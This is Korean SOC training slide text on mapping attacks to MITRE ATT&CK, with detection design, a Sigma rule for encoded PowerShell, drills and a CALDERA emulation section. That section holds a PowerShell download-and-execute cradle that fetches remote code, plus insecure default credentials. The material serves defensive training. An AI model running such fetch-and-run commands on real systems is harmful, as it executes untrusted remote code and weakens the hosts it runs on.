근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

챌린지 해설 — 완전한 공격 체인과 모범 매핑

09:11 피싱 수신 → 13:55 DB 유출 — 4시간 44분의 완전한 침해 체인

챌린지 해설

시간	로그	Tactic	Technique	핵심 근거
09:11	메일GW	Initial Access	T1566.001	xlsm 첨부 + DKIM FAIL + 연봉 사칭 사회공학
09:23	EDR	Execution + Def.Eva.	T1059.001 + T1027	Excel→wscript→PS -hidden -enc 3단 체인
09:24	DNS + FW	C&C	T1568 + T1071.001	6일 된 도메인 VT 22/94 + 75초 Beaconing
11:02	WinEvent	Credential Access	T1558.003	감염 PC에서 3분 내 8건 RC4 TGS = Kerberoasting
13:15	File	Collection	T1039 + T1530	sa 계정으로 DB 백업 12.4GB 복사 (탈취 자격증명 사용)
13:55	Proxy	Exfiltration	T1567.002	MEGA.nz에 12.1GB db_backup.zip 업로드

📝 30초 보고: "11월 28일 09시 11분 연봉 관련 스피어피싱(T1566.001)으로 시작된 침해에서 Kerberoasting(T1558.003)으로 SQL 서버 자격증명을 탈취하고, 13시 55분 고객 데이터베이스 12.1GB가 MEGA.nz로 유출(T1567.002)되었습니다. 즉각 DB 계정 전체 변경과 MEGA.nz 차단, 그리고 감염 PC(10.0.1.44) 격리를 권고합니다."

보강 설명 탐지 챌린지 해설입니다. 각 팀 발표 후 공개합니다. 피싱→실행→Kerberoasting→데이터 수집→유출의 완전한 5시간 체인입니다. 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

T1558.003챌린지 해설체인 완성

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
T1558.003를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

ATT&CK v16 주요 업데이트 요약

분기별 변화를 추적해야 탐지 체계가 최신 위협을 커버할 수 있다

ATT&CK 최신 동향

v16 주요 변경 사항 (요약)

Identity Provider 플랫폼 추가: Entra ID, Okta, Google Workspace 대상 Technique 세분화
ESXi / VMware 플랫폼 추가: 하이퍼바이저 레벨 공격 Technique 분류
신규 Sub-technique: AI 기반 공격 관련 Technique 초기 분류 시작
Data Component 보강: 기존 Technique의 탐지 전략 더 구체화
Deprecated 처리: 현실에서 더 이상 사용되지 않는 Technique 정리

SOC 운영에 미치는 영향

Entra ID/Okta 감사 로그 수집이 필수 Coverage 항목으로 부상
ESXi 대상 랜섬웨어 증가로 하이퍼바이저 모니터링 필요
AI 생성 피싱(딥페이크 음성/영상)은 기존 탐지 체계 우회 → 행동 분석 강화 필요
분기별 릴리즈 노트 확인 → Coverage 분석에 신규 Technique 즉시 추가

📍 업데이트 추적 방법:
attack.mitre.org/resources/updates/ → 최신 릴리즈 노트 확인
GitHub mitre/cti → STIX 형식으로 변경 사항 자동 추적 가능

보강 설명 최신 ATT&CK 버전의 주요 변경 사항을 정리합니다. 새로 추가된 Technique와 주요 업데이트를 통해 탐지 룰 업데이트 필요성을 파악합니다. 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

ATT&CK v16최신 업데이트신규 Technique

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
ATT&CK v16·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

한국 위협 환경 특성과 ATT&CK 적용

글로벌 ATT&CK을 국내 환경에 맞게 — 북한 APT·공공기관·망분리 특수 고려사항

국내 위협 환경

국내 위협 환경 특수성

북한 연계 APT 활발: Lazarus(G0032), Kimsuky(G0094), APT37(G0067) — 금융·방산·정부 타겟
공급망 공격 취약: 국내 소프트웨어·보안 솔루션 업데이트 채널 타겟 (3CX 유사)
망분리 환경: 인터넷망-업무망-보안망 분리 → 망간 자료 전송 경로 공격 취약
공공기관 타겟: 정부24, 행정망 연계 시스템 대상 스피어피싱 집중
암호화폐 거래소: 아시아 최대 규모 → Lazarus 그룹 핵심 타겟

국내 환경 특화 ATT&CK Coverage 우선순위

최우선: T1566(피싱) + T1195(공급망) — 국내 초기 침투 1·2위
높음: T1078.002(도메인 계정) — 망분리 우회 후 AD 타겟
높음: T1657(금전 탈취) + T1486(랜섬웨어) — 북한 APT 최종 목표
중간: T1195.002(SW 공급망) — 국내 SW 업체 타겟 공급망 공격
국내 특수: 망간 자료 전송 솔루션 취약점 모니터링

📍 국내 TI 리소스:
KISA 사이버위협동향 보고서 (kisa.or.kr)
C-TAS 사이버위협정보 공유 시스템
국가사이버안보센터 (ncsc.go.kr)

보강 설명 국내 사이버 위협 환경의 특성을 ATT&CK 관점에서 분석합니다. 북한 연계 APT, 중국 APT의 국내 타겟 패턴, 국내 특수 환경(망분리, 공공기관)에서의 ATT&CK 적용을 다룹니다. 정의만 외우기보다 왜 필요한지, 어떤 로그·행동과 연결되는지 함께 기억하면 이해가 오래갑니다.

한국 위협 환경북한 APT중국 APT

이해 포인트

한국 위협 환경를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기
비슷한 용어와 헷갈리는 차이를 한 문장으로 정리

현업 연결

실무에서 먼저 볼 로그나 도구를 함께 메모하기
이 개념이 보고·탐지·대응 어디에 쓰이는지 구분
다음 슬라이드와 이어지는 질문을 하나 만들어 보기

복습 질문

왜 필요한지 팀원에게 20초로 설명해 보기
북한 APT 1개와 묶어 기억하기
오탐 가능성 또는 해석 한계도 함께 적어 두기

ATT&CK 매핑 마라톤: 최종 집중 실습 (30분)

지금까지 배운 모든 것을 총동원 — 30분간 최대한 많이, 최대한 정확하게

최종 집중 실습

마라톤 규칙

개인 실습: 팀 도움 없이 개인별 독립 분석
30분 제한: 최대한 많은 로그 처리
채점: 정확한 Technique(3점) + 근거(1점) + Sub-tech(1점)
ATT&CK 사이트 참조 허용: 실무처럼 검색하며 분석

로그 세트: 강사가 수강생별로 다른 혼합 로그 세트 20개 배포. 각자 독립 분석 후 채점 및 공개 비교

마라톤을 통해 확인하는 것

실무 속도와 정확도의 현재 수준
자주 틀리는 Technique 파악 → 복습 우선순위
ATT&CK 사이트 탐색 속도와 효율
분석 과정에서 자연스러운 피벗 확장 여부
30초 보고 문장의 완성도와 속도

보강 설명모듈 전체의 마지막 집중 실습입니다. 30분간 최대한 많은 로그를 매핑하는 마라톤 형식으로 진행합니다. 정답보다 근거·Confidence·다음 행동을 함께 말하도록 채워 두면 발표 완성도가 높아집니다.

매핑 마라톤최종 실습집중 훈련

설명 확장

매핑 마라톤 기준으로 첫 단서를 먼저 분류하기
최종 실습를 왜 선택했는지 근거 한 줄로 적기
정답보다 판단 과정을 말로 설명하기

판단 포인트

정상 행위와 의심 행위를 구분하는 기준 메모
High·Medium·Low Confidence 이유 함께 쓰기
추가 수집이 필요한 로그를 마지막에 적기

실습 적용

시작-진행-영향-다음 행동 순서로 30초 설명
탐지 룰 또는 헌팅 가설 1개까지 연결
팀 토론에서는 근거가 강한 판단부터 합의

좋은 SOC 분석가가 되기 위한 5가지 마음가짐

기술은 배울 수 있지만 태도는 스스로 만들어야 한다 — 마지막으로 가장 중요한 이야기

마무리

호기심 — "왜?"라고 항상 묻는다

이 이벤트가 왜 발생했는가? 공격자가 왜 이 방법을 선택했는가? 호기심 없는 분석가는 로그를 처리하는 기계에 불과하다

겸손함 — "모른다"고 말할 수 있다

Confidence Low를 솔직하게 표기하고, 추가 분석이 필요하다고 말하는 것이 좋은 분석이다. 틀린 확신보다 정직한 불확실성이 낫다

끈기 — 공격자보다 더 오래 버틴다

사고는 새벽에 터진다. 힘들어도 끝까지 로그를 추적하는 끈기가 공격자를 이긴다

팀워크 — 혼자 모든 것을 알 수 없다

최고의 분석은 팀이 함께 만든다. 모르는 것은 동료에게 묻고, 아는 것은 팀과 나눈다

평생 학습 — 공격자는 매일 진화한다

ATT&CK은 분기마다 업데이트된다. 6개월 전 지식으로 오늘의 공격에 대응할 수 없다. 배움을 멈추는 순간 뒤처진다

"우리가 분석하는 로그 뒤에는 실제 사람들의 데이터가 있고, 우리가 막아야 할 피해가 있다. 그것을 기억하는 분석가가 가장 좋은 분석가다."

보강 설명기술적 역량 외에 좋은 SOC 분석가가 되기 위한 마음가짐과 태도를 이야기합니다. 로그 근거와 운영 액션까지 한 문장으로 이어 보면 학습 효과가 커집니다.

분석가 마음가짐평생 학습겸손

설명 확장

분석가 마음가짐를 목적-기술-근거 관점으로 다시 정리하기
평생 학습와 연결되는 대표 로그 또는 예시 1개 추가
앞뒤 단계와 이어지는 공격 체인을 한 줄로 설명

판단 포인트

정상 행위와 의심 행위를 나누는 기준 2개 적기
Confidence를 높일 추가 증거와 확인 순서 메모
즉시 조치와 후속 조치를 분리해서 생각하기

학습 요소

겸손 관련 ATT&CK ID·로그·대응을 묶어 기억하기
오탐 가능성과 공백 로그를 함께 체크하기
실무 보고 문장으로 바꿔 말해 보기

SOC 분석가 성장 로드맵: 단계별 ATT&CK 역량

지금 내가 어느 단계인지 파악하고 다음 단계로 가는 구체적 경로를 설계한다

치트시트 9

🔰
입문 (0~6개월)ATT&CK 기본 용어
14개 Tactic 이해
단순 로그 매핑
플레이북 따라하기
이 모듈 수강 후 달성 가능
⚔️
초급 (6개월~1년)공격 체인 재구성
기본 탐지 룰 작성
Coverage 분석 가능
30초 보고 가능
실무 6개월 + DetectionLab
🛡️
중급 (1~2년)복잡 사건 분석
탐지 룰 튜닝
헌팅 캠페인 운영
Purple Team 참여
GCIA 또는 GCIH 준비
⚡
고급 (2~3년)탐지 아키텍처 설계
팀 Coverage 전략
Purple Team 주도
CTI 연동 자동화
탐지 엔지니어 전환
🏆
전문가 (3년+)위협 헌터 또는
탐지 엔지니어 리드
업계 발표·기여
팀 멘토링
Sigma 기여 · 컨퍼런스

보강 설명SOC 분석가로서의 성장 경로를 단계별로 정리한 로드맵입니다. 각 단계에서 필요한 ATT&CK 역량과 다음 단계로 가기 위한 조건을 명확히 제시합니다. 정의·대표 Technique·추가 질문을 함께 정리해 두면 복습 효율이 올라갑니다.

분석가 성장 로드맵역량 단계Tier 1 2 3

복습 포인트

분석가 성장 로드맵 핵심 정의를 한 문장으로 다시 말하기
역량 단계와 연결되는 대표 로그 또는 사례 1개 떠올리기
다음 슬라이드로 이어지는 질문을 스스로 만들기

암기보다 이해

왜 필요한지와 무엇을 판단하는지 구분하기
용어-목적-근거를 세 칸 표처럼 정리하기
팀원에게 설명해 보며 빈 구간을 찾기

학습 요소

Tier 1 2 3 관련 ATT&CK ID·로그·조치를 묶어 기억하기
오탐 가능성과 탐지 공백도 함께 적어 두기
실제 현업 사례 1개와 연결해 기억 강화

연간 ATT&CK 도입 성과 회고: 가상 조직 사례

도입 1년 후 무엇이 달라졌는가 — Coverage·MTTD·팀 역량의 측정 가능한 변화

도입 성과 사례

지표	도입 전 (1월)	도입 후 (12월)	변화
Coverage Score 3 비율	12%	48%	+36%p
Coverage Score 0 비율	41%	8%	-33%p
평균 탐지 시간 (MTTD)	18.4시간	3.2시간	-83%
평균 대응 시간 (MTTR)	42시간	8.5시간	-80%
오탐률	73%	31%	-42%p
주간 헌팅 캠페인	없음	월 4회	신규 도입
Purple Team 실시	없음	분기 1회	신규 도입
경보 처리 분석 문서화율	22%	89%	+67%p

성과를 만든 핵심 결정 3가지

경영진 승인 Coverage 지표 도입: "오탐 0개"가 아닌 "Coverage Score 3 50% 달성"을 팀 KPI로 설정
탐지 엔지니어 전담 배정: Tier 2 분석가 1명을 탐지 엔지니어링 전담으로 역할 변경
주간 튜닝 회의 정례화: 매주 금요일 오탐 TOP 5 룰 의무 튜닝 → 오탐률 지속 하락

✅ 핵심 교훈: ATT&CK 도입은 도구나 기술 문제가 아니라 측정 체계와 습관의 문제다. Coverage를 측정하고 공개하면 자연스럽게 개선 방향이 생긴다

보강 설명 한 해 동안 ATT&CK을 실제 운영에 도입한 가상 조직의 성과 회고입니다. 도입 전후 Coverage 점수 변화, 탐지 품질 향상, 조직 역량 성장을 수치로 보여줍니다. 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

연간 회고ATT&CK 도입 성과Coverage 변화

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
연간 회고·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

역할극: CISO에게 3분 사고 브리핑

수강생이 분석가, 강사가 CISO 역할 — 실제 압박 상황에서의 발표와 Q&A 훈련

역할극 실습

역할극 설정

수강생 역할: SOC 팀장 (오늘 사고를 처음부터 분석한 담당자)
강사 역할: CISO (기술 비전문가, 비즈니스 영향 중심 관심)
상황: 오늘 새벽 3시에 발생한 랜섬웨어 공격, 현재 오전 9시 정기 경영진 회의
제약: 3분 발표 + 2분 Q&A. ATT&CK ID 사용 금지

CISO 예상 질문 (Q&A)

"고객 데이터는 유출되었나요?"
"언제 시스템을 정상화할 수 있나요?"
"이번 사고를 막을 수 있었나요?"
"재발 방지에 얼마가 필요한가요?"
"규제기관에 신고해야 하나요?"

평가 기준 (20점)

사실 정확성 (5점): 잘못된 정보 없이 사고를 설명했는가
비즈니스 언어 (4점): 기술 용어 없이 경영진이 이해하는 언어로
구조적 전달 (4점): 4단 프레임(시작·진행·영향·액션)을 따랐는가
Q&A 대응 (4점): 모르는 것은 솔직히, 아는 것은 자신 있게
다음 행동 명확성 (3점): 구체적이고 실행 가능한 권고인가

💡 황금 원칙: CISO 브리핑에서 가장 나쁜 것은 "모른다"가 아니라 "확인해보겠습니다"를 반복하는 것. 모르면 "현재 ___를 조사 중이며 오후 3시까지 업데이트하겠습니다"로 구체화

보강 설명 실제 경영진 앞에서 사고 보고를 하는 역할극 실습입니다. 수강생이 3분간 CISO 역할의 강사 앞에서 실제 보고를 진행하고 Q&A를 받습니다. 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

경영진 브리핑 역할극CISO Q&A발표 훈련

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
경영진 브리핑 역할극를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

고급 실습: Sigma Rule to SIEM 변환 실전

작성한 Sigma Rule을 실제 SIEM 쿼리로 변환하고 배포까지 전 과정 실습

Sigma 실전 변환

# 변환 대상 Sigma Rule title: Suspicious PowerShell Encoded Command logsource: category: process_creation product: windows detection: selection: Image|endswith: '\powershell.exe' CommandLine|contains|all: - '-enc ' - '-w ' condition: selection falsepositives: - Signed PowerShell scripts level: high

# 변환 결과 — Splunk SPL # sigma convert -t splunk rule.yml source=WinEventLog:Security EventCode=4688 NewProcessName="*\\powershell.exe" CommandLine="*-enc *" CommandLine="*-w *" # 변환 결과 — Elastic KQL # sigma convert -t elasticsearch rule.yml process.name: "powershell.exe" AND process.args: (*-enc* AND *-w*)

💡 실습 과제: sigma-cli 설치 후 작성한 룰을 Splunk/Elastic 형식으로 변환해 실제 SIEM에 배포. sigma-cli 설치: pip install sigma-cli

보강 설명 이제 목표 300장에 거의 다가왔습니다. 마지막 슬라이드들로 전체 모듈을 완성합니다. 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

거의 완성마지막 슬라이드목표 300장

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
거의 완성를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

2025년 주요 사이버 위협 트렌드와 ATT&CK

AI·공급망·Identity — 2025년 주목해야 할 공격 트렌드와 탐지 대응 방향

최신 위협 트렌드

 AI 기반 공격 증가
AI 생성 피싱: 개인화된 스피어피싱 자동 생성 → T1566 탐지 어려워짐
딥페이크 음성: CEO 사칭 음성 전화 → BEC 진화
자동화 취약점 탐색: AI로 제로데이 발견 속도 증가
대응: 콘텐츠 진위 확인 절차 강화, FIDO2 인증


 공급망 공격 심화
오픈소스 패키지 의존성 타겟 (npm, PyPI)
CI/CD 파이프라인 침해 → 빌드 단계 악성 코드 삽입
MFA 없는 클라우드 서비스 계정 타겟
대응: SBOM 관리, 의존성 취약점 스캔, 파이프라인 서명


 Identity 공격 집중
MFA Fatigue + OAuth 피싱 조합 증가
AD → Entra ID → SaaS 연쇄 침해
서비스 계정·워크로드 Identity 타겟
대응: FIDO2, Conditional Access, PAM 강화

💡 SOC 적응 방향: 기존 시그니처 탐지 한계 → 행동 기반 분석 비중 확대 | Identity 로그(Entra ID/Okta) SIEM 수집 필수화 | AI 도구를 방어에도 적극 활용

보강 설명 최근 사이버 위협 트렌드를 ATT&CK 관점에서 정리합니다. AI 기반 공격, 공급망 공격 증가, Identity 공격 심화 등 최신 동향을 다룹니다. 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

2025 위협 트렌드AI 기반 공격공급망 공격

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
2025 위협 트렌드·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

📍 250번째 슬라이드 — 목표 300장까지 50장 남음

우리가 지키는 것은
로그가 아니라
사람들의 삶이다

병원의 환자 기록, 금융 거래, 개인 정보,
기업의 기술과 지식, 국가의 인프라.

SOC 분석가는 이 모든 것을 지키는 마지막 방어선이다.

(주)아울네스트 · 한국인터넷진흥원 발주 · 2026

ATT&CK 기반 탐지 체계 전체 아키텍처

로그 수집 → 파싱 → 탐지 → 경보 → 대응 — 각 레이어에서 ATT&CK이 연결되는 방식

탐지 아키텍처

① 데이터 수집

🖥️ EDR (Sysmon)
🪟 Windows EventLog
🌐 DNS / Proxy
🔥 Firewall / NDR
☁️ CloudTrail
📧 메일GW

ATT&CK: Data Source 매핑

② 정규화·파싱

⚙️ SIEM 파서
📊 ECS / CIM 정규화
🔑 필드 추출
🕒 타임존 통일
🔗 엔터티 연결

품질 = Coverage 기반

③ 탐지 엔진

📋 Sigma 룰
🔗 상관 규칙
🤖 ML 이상탐지
📡 TI 매칭
🎯 헌팅 쿼리

ATT&CK: Technique 태그 부착

④ 경보·Triage

🔔 우선순위 분류
📝 ATT&CK 매핑
📊 Confidence 평가
🔄 SOAR 트리거
👤 담당자 배정

ATT&CK: 체인 연결 분석

⑤ 대응·개선

🛡️ 격리·차단
📋 플레이북 실행
📄 PIR 작성
📈 Coverage 업데이트
🔄 Purple Team

ATT&CK: Coverage 개선 루프

✅ ATT&CK은 이 전체 아키텍처를 관통하는 공통 언어다 — 수집 단계의 Data Source부터 대응 단계의 Coverage 개선까지 모든 레이어에서 ATT&CK이 연결됨

보강 설명 ATT&CK 기반 전체 탐지 체계 아키텍처를 다이어그램으로 정리합니다. 로그 수집부터 경보까지의 전체 흐름과 각 레이어에서 ATT&CK이 어떻게 활용되는지 보여줍니다. 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

탐지 아키텍처전체 흐름레이어별 역할

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
탐지 아키텍처·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

공격자 에뮬레이션 심화: CALDERA로 자동화 검증

APT 그룹 TTP를 자동으로 에뮬레이션해 탐지 Coverage를 체계적으로 검증한다

에뮬레이션 심화

CALDERA 주요 특성

MITRE 공식 개발: ATT&CK과 완전 통합된 자동화 공격 에뮬레이션 플랫폼
Adversary Profile: APT 그룹별 TTP를 선택해 자동 실행
Agent 기반: 타겟 시스템에 에이전트 설치 → 원격 제어
ATT&CK 자동 태그: 각 작업 실행 결과에 Technique ID 자동 부착
무료 오픈소스: github.com/mitre/caldera

에뮬레이션 실행 흐름

① Adversary Profile 선택 (Lazarus 등)
② 타겟 에이전트 등록
③ 작전(Operation) 시작 → 자동 TTP 실행
④ 각 단계별 탐지 여부 수동 확인 또는 SIEM 자동 비교
⑤ Coverage 점수 업데이트

# CALDERA 빠른 시작 git clone https://github.com/mitre/caldera.git cd caldera pip install -r requirements.txt python server.py --insecure # 웹UI: http://localhost:8888 # 기본 계정: admin / admin # 에이전트 배포 (Windows) $server="http://caldera-server:8888" Invoke-Expression (New-Object Net.WebClient) .DownloadString("$server/file/download")

✅ CALDERA vs Atomic Red Team:
Atomic = 개별 Technique 수동 테스트
CALDERA = 전체 공격 체인 자동 에뮬레이션
→ 두 도구를 함께 사용하면 Coverage 검증 완성

보강 설명 실제 공격자 TTP를 에뮬레이션해 방어 체계를 검증하는 방법을 체계적으로 다룹니다. CALDERA와 Atomic Red Team을 조합한 자동화 에뮬레이션 플랫폼을 소개합니다. 조건·예외·후속 조치를 같이 봐야 탐지 품질이 올라갑니다.

공격자 에뮬레이션CALDERAAdversary Emulati…

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
공격자 에뮬레이션·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

보안 시스템 통합: EDR·SIEM·SOAR·TIP 데이터 흐름

ATT&CK을 공통 언어로 — 분산된 보안 시스템을 하나의 탐지 생태계로 연결

보안 통합

EDR / NDR

→

Sysmon·네트워크 이벤트 스트림

↓ 정규화·파싱

SIEM

←→

TIP (MISP)

ATT&CK TTP 자동 매핑

↓ 경보 발화

SOAR

→

ATT&CK 기반 플레이북 자동 실행

↓ 결과 피드백

Coverage DB

→

Coverage 점수 자동 업데이트

ATT&CK이 통합의 핵심인 이유

EDR이 탐지한 T1059.001 경보 → SIEM에서 같은 태그로 상관 분석
TIP에서 받은 IOC + ATT&CK TTP → SIEM 탐지 룰 자동 생성
SOAR 플레이북이 Technique별로 다른 대응 자동 실행
모든 시스템이 ATT&CK을 공통 언어로 사용 → 데이터 사일로 없음

💡 통합 API 표준:
STIX 2.1 / TAXII 2.1 → TIP 연동 표준
OpenC2 → SOAR 자동화 명령 표준
OCSF → 로그 정규화 표준 (AWS 주도)

보강 설명EDR, SIEM, SOAR, TIP 등 여러 보안 시스템 간의 데이터 흐름을 최적화하는 방법입니다. 데이터 원천·오탐 구분·운영 액션까지 연결해야 실무 적용도가 높아집니다.

T1059.001보안 통합EDR SIEM SOAR TIP

설계 포인트

T1059.001에 필요한 Data Source를 먼저 정리하기
보안 통합를 어떤 조건으로 탐지할지 구체화하기
룰·대시보드·플레이북을 같은 언어로 정렬하기

튜닝 포인트

화이트리스트·시간대·자산 중요도 조건 추가
False Positive와 False Negative를 따로 점검
검증 결과를 Coverage 점수에 반영하기

운영 적용

분기별 ATT&CK 버전 업데이트를 체크리스트화
CTI·Purple Team 결과를 룰 개선 backlog로 연결
티켓 문장까지 동일한 ATT&CK 용어로 통일

최종 실습: 나만의 ATT&CK 기반 SOC 환경 설계 (30분)

내 실제 환경(또는 가상 환경)에 맞는 완전한 ATT&CK 기반 보안 운영 계획 수립

종합 설계 실습

설계 대상 환경 선택

🏢 A: 직원 200명 중소기업 (Windows AD, 온프레미스 위주)
🏦 B: 직원 1,000명 금융사 (망분리, 규제 환경)
☁️ C: 스타트업 (AWS 클라우드 전용, 직원 50명)
🏥 D: 병원 (EMR 시스템, OT/의료 기기 포함)
🎯 내 환경: 실제 근무 환경 직접 설계

설계 포함 항목 (30분)

로그 수집 계획 (소스별, ATT&CK Data Source 기준)
Top 10 탐지 우선순위 Technique + 이유
탐지 룰 3개 스케치 (Sigma 형식)
월간 헌팅 캠페인 계획 (3개 가설)
Coverage 목표 (1년 후 점수 3 비율 목표)

평가 기준 (30점)

로그 수집 계획 현실성: 6점
탐지 우선순위 논리: 6점
탐지 룰 완성도: 8점
헌팅 가설 테스트 가능성: 6점
Coverage 목표 달성 가능성: 4점

✅ 이 실습의 의미:
교육에서 배운 내용을 내 현실에 적용하는 첫 번째 단계. 완벽하지 않아도 됩니다. 시작하는 것이 중요합니다.

보강 설명수강생이 자신의 실제 또는 가상 환경에 맞는 SOC 환경을 설계하는 최종 실습입니다. 정답보다 근거·Confidence·다음 행동을 함께 말하도록 채워 두면 발표 완성도가 높아집니다.

SOC 환경 설계개인 프로젝트완전한 보안 계획

설명 확장

SOC 환경 설계 기준으로 첫 단서를 먼저 분류하기
개인 프로젝트를 왜 선택했는지 근거 한 줄로 적기
정답보다 판단 과정을 말로 설명하기

판단 포인트

정상 행위와 의심 행위를 구분하는 기준 메모
High·Medium·Low Confidence 이유 함께 쓰기
추가 수집이 필요한 로그를 마지막에 적기

실습 적용

시작-진행-영향-다음 행동 순서로 30초 설명
탐지 룰 또는 헌팅 가설 1개까지 연결
팀 토론에서는 근거가 강한 판단부터 합의

보안 분석가의 글쓰기: 명확하고 행동 가능한 문서 작성

좋은 분석이 나쁜 글쓰기로 묻힌다 — 기술 역량과 커뮤니케이션 능력은 함께 성장해야 한다

보안 커뮤니케이션

좋은 보안 문서의 원칙

Bottom Line Up Front (BLUF): 결론과 권고를 첫 문단에 — 바쁜 독자는 앞만 읽는다
적절한 기술 수준: 독자가 누구인지 파악 후 용어 수준 결정
근거 명시: 모든 주장에 로그·증거·데이터 인용
불확실성 표기: "확인됨" vs "추정됨" vs "조사 필요" 명확히
행동 가능한 권고: "보안 강화 필요" X → "2주 내 EventID 4698 탐지 룰 작성" O

보고서 작성 전 셀프 체크

☐ 첫 문단에 결론과 권고가 있는가?
☐ 독자가 이해할 수 있는 언어인가?
☐ 모든 주장에 증거가 있는가?
☐ 불확실한 부분을 명확히 표기했는가?
☐ 다음 행동이 구체적이고 실행 가능한가?
☐ 3분 안에 핵심을 이해할 수 있는가?

"좋은 보고서는 읽히고, 좋은 분석은 행동으로 이어진다."

보강 설명보안 분석가의 글쓰기 능력이 기술 역량만큼 중요합니다. 분석 보고서, 경고 메시지, 팀 공유 문서 작성의 원칙을 다룹니다. 로그 근거와 운영 액션까지 한 문장으로 이어 보면 학습 효과가 커집니다.

보안 글쓰기분석 보고서 작성명확한 커뮤니케이션

설명 확장

보안 글쓰기를 목적-기술-근거 관점으로 다시 정리하기
분석 보고서 작성와 연결되는 대표 로그 또는 예시 1개 추가
앞뒤 단계와 이어지는 공격 체인을 한 줄로 설명

판단 포인트

정상 행위와 의심 행위를 나누는 기준 2개 적기
Confidence를 높일 추가 증거와 확인 순서 메모
즉시 조치와 후속 조치를 분리해서 생각하기

학습 요소

명확한 커뮤니케이션 관련 ATT&CK ID·로그·대응을 묶어 기억하기
오탐 가능성과 공백 로그를 함께 체크하기
실무 보고 문장으로 바꿔 말해 보기

실전 케이스: 헬스케어 데이터 유출 ATT&CK 분석

환자 정보 100만 건 유출 — EMR 침해부터 클라우드 업로드까지의 ATT&CK 체인

헬스케어 보안

T1190 — EMR 웹 포탈 SQL 인젝션

